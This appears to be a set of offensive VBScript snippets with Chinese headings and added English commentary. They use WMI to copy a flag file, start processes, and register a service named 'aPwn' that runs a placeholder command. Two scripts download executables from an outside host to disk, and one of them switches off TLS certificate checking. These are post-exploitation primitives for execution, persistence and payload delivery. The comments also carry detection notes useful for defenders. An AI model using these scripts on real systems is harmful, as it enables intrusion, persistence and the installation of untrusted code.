vbs调用WMI接口复制文件:
' Copies one file through the WMI CIM_DataFile class rather than the FileSystemObject.
' GetObject connects to the local machine (".") in the root\CIMV2 namespace.
' WMI class names are matched case-insensitively, so the "CIM_DataFIle" spelling resolves.
Set objWMIService = GetObject("winmgmts://./root/CIMV2")
' WQL uses "\" as its escape character, which is why every path backslash is doubled here.
Set colFiles = objWMIService.ExecQuery("SELECT * FROM CIM_DataFIle Where Name='c:\\target\\Flag.dat'")
' VBScript identifiers are case-insensitive, so ColFiles is the colFiles set above.
For Each objFile In ColFiles
' CIM_DataFile.Copy returns a status code that is discarded, so a failed copy
' (missing destination folder, access denied) goes unnoticed by the script.
' Defensive note: a copy done this way is WMI provider activity, not an ordinary
' file-copy API call, so WMI activity logging is the better place to look for it.
objFile.Copy("C:\pwn\Flag.dat")
Next
创建进程:
' Starts a process through Win32_Process.Create instead of WScript.Shell.
' strShell is declared but never used in this snippet.
Dim objWMIService, objProcess, strShell, objProgram
set objWMIService = getobject("winmgmts://./root/cimv2")
' Get the class object (not an instance) so its Create method can be invoked.
Set objProcess = objWMIService.Get("Win32_Process")
' Build an input-parameter object for Create; only CommandLine is filled in,
' so CurrentDirectory and ProcessStartupInformation take their defaults.
Set objProgram = objProcess.Methods_("Create").InParameters.SpawnInstance_
objProgram.CommandLine = "Calc.exe"
' ExecMethod's return object (ReturnValue / ProcessId) is not captured, so
' success or failure of the launch is never checked.
' Defensive note: the child is spawned by the WMI provider host (WmiPrvSE.exe),
' not by the script host, which is what process-tree based detections should expect.
objWMIService.ExecMethod "Win32_Process", "Create", objProgram
创建服务:
' Registers a Windows service via Win32_BaseService.Create and then starts it.
' ServiceType 16 (0x10) is SERVICE_WIN32_OWN_PROCESS.
Const OWN_PROCESS = 16
' Value for the DesktopInteract parameter of Create.
Const NOT_INTERACTIVE = False
' NOTE(review): in the Win32_BaseService.Create documentation ErrorControl 1 is
' "Normal" and 2 is "Severe"; the constant name does not match its value — confirm.
Const NORMAL_ERROR_CONTROL = 2
' impersonationLevel=impersonate makes the provider act under the caller's own token.
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set objService = objWMIService.Get("Win32_BaseService")
' Create(Name, DisplayName, PathName, ServiceType, ErrorControl, StartMode,
' DesktopInteract, StartName, StartPassword). StartMode is "Manual" and the
' service account is NT AUTHORITY\LocalService. PathName is still the
' placeholder string from the original author.
' Defensive note: a service installed this way is recorded by the Service Control
' Manager like any other (System log, service-installed event), independent of
' whether WMI, sc.exe or the API was used to create it.
errReturn = objService.Create("aPwn" ,"aPWN service" ,"这里修改成要执行的命令", OWN_PROCESS, NORMAL_ERROR_CONTROL, "Manual", NOT_INTERACTIVE, "NT AUTHORITY\LocalService", "" )
' Only return code 23 enters the start loop. Per the Win32_BaseService.Create
' documentation, 23 is the "service already exists" status, so a service that
' was just created successfully (return 0) is not started by this script.
If errReturn = 23 Then
' Default-namespace connection; looks the service up by its Name property.
Set ServiceSet = GetObject("winmgmts:").ExecQuery("select * from Win32_Service where Name='aPwn'")
for each Service in ServiceSet
' StartService returns a status code that is not checked.
Service.StartService()
next
End If
vbs下载文件脚本:
' Fetches a file over plain HTTP with Msxml2.XMLHTTP and writes the raw response
' bytes to disk through an ADODB.Stream.
' adTypeBinary (1): the stream carries bytes, not text.
Const adTypeBinary = 1
' adSaveCreateOverWrite (2) is declared but never passed to SaveToFile below, so
' SaveToFile runs with its default (adSaveCreateNotExist) and fails if the
' destination file already exists.
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.XMLHTTP")
' Synchronous request (third argument False) to a hard-coded private-range address.
' http.status is never examined, so a 404/500 body would be written to disk as-is.
http.open "GET","http://192.168.81.192/putty.exe",False
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
' responseBody is the undecoded byte array of the response.
ado.Write http.responseBody
' The destination folder must already exist; SaveToFile does not create it.
' Defensive note: the XMLHTTP + ADODB.Stream pairing is a classic script download
' pattern; wscript/cscript instantiating these two COM objects is a useful hunting signal.
ado.SaveToFile "c:\download\a.exe"
ado.Close
下面这个支持https下载:
' HTTPS variant of the download above, using Msxml2.ServerXMLHTTP.6.0 (which
' exposes SetOption) instead of Msxml2.XMLHTTP.
Const adTypeBinary = 1
' Declared but never passed to SaveToFile; see the plain-HTTP variant.
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.ServerXMLHTTP.6.0")
' Option 2 is SXH_OPTION_IGNORE_SERVER_SSL_CERT_ERROR_FLAGS; 13056 (0x3300) sets
' all four ignore bits (unknown CA, wrong usage, CN mismatch, expired date).
' Certificate validation is therefore switched off: the connection is encrypted
' but the server is not authenticated, so from an integrity standpoint this is
' no stronger than the plain-HTTP version.
http.SetOption 2, 13056
' Synchronous request; http.status is not checked before the body is saved.
http.open "GET","https://xxx.com/1.exe",False
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
' Destination folder is assumed to exist; the default save mode fails if the file exists.
ado.SaveToFile "c:\download\a.exe"
ado.Close